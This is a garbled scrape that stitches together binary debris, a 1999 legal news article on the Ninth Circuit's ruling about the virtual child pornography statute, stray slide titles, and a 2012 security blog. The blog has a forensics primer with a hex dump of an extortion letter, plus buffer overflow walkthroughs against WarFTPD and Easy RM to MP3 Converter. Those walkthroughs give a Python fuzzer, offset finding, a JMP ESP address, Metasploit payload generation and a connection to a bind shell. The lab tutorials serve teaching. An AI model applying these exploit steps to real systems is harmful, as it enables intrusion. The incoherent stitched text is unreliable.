8983:�*�J�j��ADocs`��DOCS ��z7)7)�z7)APics`��PICS ��z7)7)�z7)vARP EXE ��z7)7)eY▒!K PLFTP EXE $�z7)7)eY▒!r ��Brus��lovel�etter.viLOVELE~1VIR��z7)7)�=5)� !?Aouchy�.dat��OUCHY DAT ��z7)7)▒�s(� SAsnoof�.gz��SNOOF GZ ��z7)7)s=)
39284:Ninth Circuit Strikes Federal �Virtual� Child Pornography Law on First Amendment Grounds
INCLUDEPICTURE \d "/images/design/5x5.gif"

INCLUDEPICTURE \d "/images/design/5x5.gif"
INCLUDEPICTURE \d "/images/design/5x5.gif"
INCLUDEPICTURE \d "/images/design/5x5.gif"
HYPERLINK "mailto:info@lawnewsnetwork.com"mailto:info@lawnewsnetwork.com
HYPERLINK "http://www.almdc.com/"Criminal Justice Weekly
December 21, 1999
INCLUDEPICTURE \d "/images/design/5x5.gif"
INCLUDEPICTURE \d "/images/design/line2.gif"
INCLUDEPIThe First Amendment prohibits Congress from enacting a statute criminalizing the generation of computer images of fictitious children engaged in imaginary but explicit sexual conduct, the U.S. Court of Appeals for the Ninth Circuit held Dec. 17, widening a split in the circuits. Specifically, the court struck certain language in the Child Pornography Prevention Act of 1996, 18 U.S.C. �2256, prohibiting a "visual depiction" that "is, or appears to be, of a minor engaging in sexually explicit conduct," and advertising or promotion of such images, as unconstitutionally vague and overbroad, language which was found last month to be constitutional by the Eleventh Circuit in U.S. v. Acheson, 11th Cir., No. 98-3559, Story, J., 11/12/99 (Free Speech Coalition v. Reno, 9th Cir., No. 97-1653Section 2256(8) defines child pornography as "any visual depiction, including any photograph, film, video, picture, or computer or computer-generated image or picture, whether made or produced by electronic, mechanical, or other means, of sexually explicit conduct[.]" At issue in the appeal were the definitions contained in subsections (B) and (D). Section 2256(8)(B) bans sexually explicit depictions that appear to be minors. Section 2256(8)(D) bans visual depictions that are "advertised, promoted, presented, described or distributed in such a manner that conveys the imThe plaintiffs were a group of adult-oriented businesses and erotic artists who withheld or stopped distributing certain artistic works out of fear of prosecution under the 1996 amendments. The district court found that the plaintiffs had standing to bring their First Amendment challenge, and the government did not contest that finding on appeal. The district court granted summary judgment in favor of the government on the First Amendment issues, however. On appeal, the plaintiffs argue that where the statute fails to define "appears to be" and "conveys the impression," it is so vague a person of ordinary intelligence cannot understand whatThe Ninth Circuit, in an opinion by U.S. District Judge Donald W. Molloy (D. Mont.), sitting by designation, agreed on that point, while holding most of the statute still passes constitutional muster. However, it did not hold, as the dissent claimed, that the First Amendment protects all computer-generated imaginary images of child pornography. "Because the statute is severable, our holding demonstrates that if morphed computer images are of an identifiable child, the statute is enforceable because there is then the potential harm to a real child."
CONTENT DISCRIMINATION

844548426: <dc:format>image/jpeg</dc:format>

845713864: <dc:format>image/jpeg</dc:format>

846648084: <dc:format>image/jpeg</dc:format>

Project managers may still need to break the rules to meet project goals, and senior managers must support those actions�T�

853499180:��▒�Rectangle 3��

Business Service Management (BSM) tools track the execution of business process flows�ZRd information

853567991:Concourse

1_Concourse

2_Concourse

3_Concourse

4_Concourse

5_Concourse

6_Concourse

7_Concourse

8_Concourse

9_Concourse*Chapter 4: Project Integration ManagementLearning Objectives Learning Objectives (continued) Learning Objectives (continued)HThe Key to Overall Project Success: Good Project Integration Management)Project Integration Management Processes5Project Integration Management Processes (continued)3Figure 4-1. Project Integration Management SummaryWhat Went Wrong?)Strategic Planning and Project SelectionLFigure 4-2. Mind Map of a SWOT Analysis to Help Identify Potential Projects4Figure 4-3. Information Technology Planning ProcessBest PracticeMethods for Selecting Projects'Focusing on Broad Organizational NeedsCategorizing IT ProjectsFinancial Analysis of Projectset Present Value Analysis&Figure 4-4. Net Present Value Example'Figure 4-5. JWD Consulting NPV ExampleNPV CalculationsReturn on InvestmentPayback Analysis(Figure 4-6. Charting the Payback PeriodWeighted Scoring Model@Figure 4-7. Sample Weighted Scoring Model for Project Selection"Implementing a Balanced Scorecard'Figure 4-8. Balanced Scorecard ExampleProject ChartersXTable 4-1. Contoh Project Charter for the DNA-Sequencing Instrument Completion Project Table 4-1. Charter (continued)Project Management Plans-Common Elements of a Project Management PlanITable 4-2. Sample Contents for a Software Project Management Plan (SPMP)What the Winners DoProject Execution$Coordinating Planning and Execution.Providing Leadership and a Supportive Culture'Important Skills for Project Execution'Project Execution Tools and Techniques(Monitoring and Controlling Project WorkMedia Snapshot▒Integrated Change Control2Change Control on Information Technology ProjectsChange Control Systemhange Control Board (CCB)Making Timely ChangesConfiguration Management@Table 4-3. Suggestions for Performing Integrated Change ControlClosing Projects and Phases;Using Software to Assist in Project Integration ManagementChapter Summary

Fonts UseTheme

root@bt: ~/evid: xxd -s 75441 image.disk1 | less

00126b1: 796f 7520 616e 6420 796f 7572 2065 6e74 you and your ent

00126c1: 6972 6520 6275 7369 6e65 7373 2072 616e ire business ran

00126d1: 736f 6d2e 0a0a 5468 6973 2069 7320 6e6f som...This is no

00126e1: 7420 6120 6a6f 6b65 2e0a 0a49 2068 6176 t a joke...I hav

00126f1: 6520 6861 6420 656e 6f75 6768 206f 6620 e had enough of

0012701: 796f 7572 206d 696e 646c 6573 7320 636f your mindless co

0012711: 7270 6f72 6174 6520 7069 7261 6379 2061 rporate piracy a

0012721: 6e64 2077 696c 6c20 6e6f 206c 6f6e 6765 nd will no longe

0012731: 7220 7374 616e 6420 666f 7220 6974 2e20 r stand for it.

0012741: 596f 7520 7769 6c6c 2072 6563 6965 7665 You will recieve

0012751: 2061 6e6f 7468 6572 206c 6574 7465 7220 another letter

0012761: 6e65 7874 2077 6565 6b2e 2020 4974 2077 next week. It w

0012771: 696c 6c20 6861 7665 2061 2073 696e 676c ill have a singl

0012781: 6520 6261 6e6b 2061 6363 6f75 6e74 206e e bank account n

0012791: 756d 6265 7220 616e 6420 6261 6e6b 206e umber and bank n

00127a1: 616d 652e 2020 4920 7761 6e74 2079 6f75 ame. I want you

00127b1: 2074 6f20 6465 706f 7369 7420 2435 302c to deposit $50,

00127c1: 3030 3020 696e 2074 6865 2061 6363 6f75 000 in the accou

00127d1: 6e74 2074 6865 2064 6179 2079 6f75 2072 nt the day you r

00127e1: 6563 6569 7665 2074 6865 206c 6574 7465 eceive the lette

00127f1: 722e 2020 0a0a 446f 6e27 7420 7472 7920 r. ..Don't try

0012801: 616e 7974 6869 6e67 2c20 616e 6420 646f anything, and do

0012811: 6e74 2063 6f6e 7461 6374 2074 6865 2063 nt contact the c

0012821: 6f70 732e 2020 4966 2079 6f75 2064 6f2c ops. If you do,

0012831: 2049 2077 696c 6c20 756e 6c65 6173 6820 I will unleash

0012841: 6120 7669 7275 7320 7468 6174 2077 696c a virus that wil

0012851: 6c20 6272 696e 6720 646f 776e 2079 6f75 l bring down you

0012861: 7220 7768 6f6c 6520 6e65 7477 6f72 6b20 r whole network

:continues....

Thursday, October 25, 2012

What is mean by computer forensics

Computer forensics is also known by the name of digital forensics is a branch of forensic science pertaining to legal evidence found in computers and digital storage media.

The goal of computer forensics is to explain the circumstances now are of a digital artifact. The term digital artifact can include a computer system, storage media (such as flash disk, hard disk, or CD-ROM), an electronic document (e.g. an email message or JPEG images), or even a series of packages that are switching in computer networks. The explanation could be simply "there's information here?" to "elaborate as what the sequence of events that led to the current situation?".

Computer forensics is also used to eradicate corruption and fraud (fraud) in cyberspace (internet). The investigation of corruption and fraud carried out by taking electronic data and then analyzed for use in court (admissible) as evidence of the legal data records should not be subjected to the slightest changes of the initial conditions of the data found. If the data is changed then it cannot be used in court (the data are no longer authentic).

The use of computer forensics for example for:

1. looking for evidence of fraud or corruption committed by employees

2. Performs analysis on a compromised computer system hackers. How do the hackers get access and what it does.

3. do the recovery lost data either intentional or not, even after a hard disk format or the use of others.

To be submitted as electronic evidence in court, the results of computer forensics should be:

1. meet certain standards, namely (1) admissible (2) authentic (3) complete (4) believable (5) reliable

2. computer forensics tools must be validated methodology. who know but just doang ngakunya abal-abal

3. the electronic storage media must be clearly marked ' chain of custody ' since the initial capture until finally submitted to the Court

4. in general the electronic storage media examination should be done at the owner's permission (with a letter of approval or ' letter of consent '), unless it is done by the authority of law (in wake of indo Attorney, police, KPK)

In the process of computer forensics, data retrieval is known by the term ' computer forensic imaging ' where the suspect hard drives made copy of it is exactly the same (including also the data that was deleted and the technical areas of the hard drive unreadable in the operating system).

Software used on computer forensics is forensic imaging with the aim is make copies of identical electronic data from the target. Imaging process keeping in order that preliminary data do not experience changes with how to make the ' write blocked'terhadap electronic storage media. The Hardware and software that are used specifically for keeping the data in order to remain intact as before (no change) can even evoke the files that have been erased. It aims to find evidence of perpetrators of corruption and fraud.

Some of the vendors who provide computer forensics technology such as Parabens, Guidance (EnCase), GetData (Mount Image), etc.

Searching Unallocated and Slack Space for Text

Now let’s go back to the original image. The restored disk (or loopmounted disk image) allowed you to check all the files and directories (logicalview). What about unallocated and slack space (physical view)? We will now

analyze the image itself, since it was a bit for bit copy and includes data in theunallocated areas of the disk.Let’s assume that we have seized this disk from a former employee of alarge corporation. The wouldbe cracker sent a letter to the corporationthreatening to unleash a virus in their network. The suspect denies sending theletter. This is a simple matter of finding the text from a deleted file (unallocatedspace).

Sunday, October 7, 2012

Buffer Overflow with Fuzzer and Fuzzing use WarFTPD & Ollydbg

Buffer Overflow
Buffer overflow itself is a process that goes on inside a computer memory system in which there is an normal process at the time of the temporary data storage in memory i.e. when there is data that will be stored exceeds the capacity of the buffer (temporary storage) in memory.

FUZZER
fuzzer itself is a word that is widely used in the world of science technology one is fuzzy logic, but this discussion on fuzzer no his relationship with fuzzy logic, Fuzzer is a mention to the applications used on the process of fuzzing.

FUZZING
fuzzing is an early stage which is sure to be done by a security researcher, an application will be in line to manage the data that is not normal, so it will be seen how applications handle data as well as the process of error handling by the application, from the process here, a researcher can see if there's a gap in security application that can be exploited.

Toolstools that will be used as follows :
* Ollydbg as a debugger
* Fuzzer to do the process Fuzzing
* Phyton, used to create an application fuzzer and exploit

WarFTPD
Applications that will be used as the target is the application of WarFTPD made by Jarle (jgaa) Aase, is an FTP server application running on a Windows operating system.as seen in the image below :

For the application, to be exploited is an FTP server application, so here I am trying to make a simple fuzzer can send data at FTP protocol. the fuzzer is created using a language Python.

as the example below :
#!/usr/bin/python
import socket
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer ="\x41" * 1000

s . connect (('192.168.56.101 ' ,21))

data =s.recv (1024)
print("sendingevildatavia USER command...")
s.send('USER '+buffer+'\r \n')
data = s.recv (1024)
s.send('PASS PASSWORD'+'\r \n')
s.close()
print ("Finish")

To run WarFTP server, select the Start menu Properties-> Service

the status of WarFTP will become idle.To check whether the server is running and can be contacted via the BackTrack system, try to connect to FTP using NC, run the following command :

the next process is to try to run an application fuzzer which adauntuk runs when the command line, make sure that the window's previous Virtualbox can be seen clearly, the goal is to see what happens to the application server WarFTP.root@bt:~#python BackTrack.py

This time will also be used as an application for Ollydbg perform debugging on an application server WarFTP

for Ollydbg can see what happens when the application crashes, run WarFTP server through applications, when Ollydbg WarFTP server application tried to run back, then an Error message will appear.

to prevent the occurrence of such error appeared again during the process of development, please follow these steps :

* delete the file FtpDaemon.

* run WarFTP server application again.

* create a user through the User Security dummies.

run WarFTP back when walking normally without the memuculkan error messages, run WarFTP server applications through the Ollydbg.

then it would appear like the following :

lets go , now through the application Konsole on BackTrack, go into the folder, such as the following :
#cd /opt/metasploit/msf3/tools/

If it looks pattern_create.rb
run to generate as much as 1000 byte data, run like this :
./pattern_create.rb 1000 > string_pattern.txt

look the strings as much as 1000 characters, starting from the character "Aa0Aa1Aa2Aa3A" until the character "Bh0Bh1Bh2B"
After the string pattern has been successfully created, the next step enter this data into an application fuzzer which has previously been made, the data pattern that is going to replace the character "A" data on a fuzzer, use a text editor to modify existing scripts in an application fuzzer.

After changing into a collection of pattern strings generate results from pattern_create. rb, continue the next step, run WarFTP server applications through the Ollydbg.

Unlike before, the current value from the register in the memory the application server is fully WarFTP with string pattern that had been incorporated into an application fuzzer, note the data contained in the register.Now use the pettern_offset application will calculate how many bytes of data from the initial pattern to stirng contained in such registers

do konsole as below :

#./pattern_offset.rb 32714131-> Nilai EIP
486 -> EIP It takes data of 485 bytes

#./pattern_offset.rb q4Aq5Aq-> Nilai ESP
493 -> to achieve the required data stack of 493 bytes

now continue by entering such a fuzzer script below, and proceed with as the previous step..

now consider the value that appears in the window stack and registers in Ollydbg, seen that the value in register EIP be DEADBEEF.

run the application using the Ollydbg, on a Special Executable modules,

then it would appear like the following.

If it looks like the above, proceed to determine which libraries you want to use, double click on the file name, then it will appear as follows.

It appears as below, now do right click in the main window: Search For-> Command.

the input JMP ESP in window and press the find Command Find

then it will look 7E429353 address JMP ESP, it's on me,

such as the following:

the next thing to do is change the offset address into little endian format, from 7E429353 to \x53\x93\x42\x7E, note the following script:

now run WarFTP Ollydbg and again as before,

then it will appear as follows:

now run WarFTP Ollydbg and again as before,

right-click the selected Breakpoint-> memory, on access.

next run on the console, run the ./msfweb.

Now we will go on the payload, payload that will choose in the next build, Metasploit will display the configuration menu of the payload type of the shell as it looks like the following figure,don't forget after you finish press generate to generate the payload has been selected.:

now live the payload that is insert the code into the application that has been used previously, such as the following:

now run WarFTP Ollydbg and again as before, if not in error then run with # telnet 192.168.56.101 4444, then it will occur as follows :

Install Mutillidae Backtrack 5

Well, now we are trying to install the Mutillidae.
Well ... If you don't already have a download on the internet, mutillidae
or download the link below ...:

http://sourceforge.net/projects/mutillidae/files/latest/download

What if you already download now lives we Exstrac to the root

like below ...:

When it's on Exstrac now living in the run to the Terminal.......:

Install aphace2 first if not installed.After that continue with Terminan..:

After that install live MYSQL server:

Saturday, October 6, 2012

STACK BUFFER OVERFLOW EASY RM TO MP3 CONVERTER

Buffer Overflow
Buffer overflow itself is a process that goes on inside a computer memory system in which there is an normal process at the time of the temporary data storage in memory i.e. when there is data that will be stored exceeds the capacity of the buffer (temporary storage) in memory.

FUZZER
fuzzer itself is a word that is widely used in the world of science technology one is fuzzy logic, but this discussion on fuzzer no his relationship with fuzzy logic, Fuzzer is a mention to the applications used on the process of fuzzing.

FUZZING
fuzzing is an early stage which is sure to be done by a security researcher, an application will be in line to manage the data that is not normal, so it will be seen how applications handle data as well as the process of error handling by the application, from the process here, a researcher can see if there's a gap in security application that can be exploited.

Toolstools that will be used as follows :
* Ollydbg as a debugger
* Fuzzer to do the process Fuzzing
* Phyton, used to create an application fuzzer and exploit

Before we start you need to have the application of EASY RM TO MP3 CONVERTER, like the following :

For the application EASY RM TO MP3 CONVERTER, so here I am trying to make a simple fuzzer can send data at Mp3 protocol. the fuzzer is created using a language Python.

as the example below :

Now we run does occur on the application crash Easy RM MP3 converter,

in the event of a crash it will arise as follows :

now start to use Ollydbg,so we know the crash it on the EIP does not,

Open Ollydbg and Easy RM MP3 converter, the Ollydbg click file-> tattach->select RM2MP3Converter->attach->and then Turn on and then run RM2MP3, click load->the input file name and files of type->Open to clarify do as follows :

ow start to figure out how many bytes, then using pattern_create, run the command as follows:

./pattern_create.rb > 27000 string_pattern .txt

already seen the string pattern as much as 27000 character, continue with place the string on a fuzzer,,

run as before..

Now use the pettern_offset application will calculate how many bytes of data from the initial pattern to stirng contained in such registersdo konsole as below :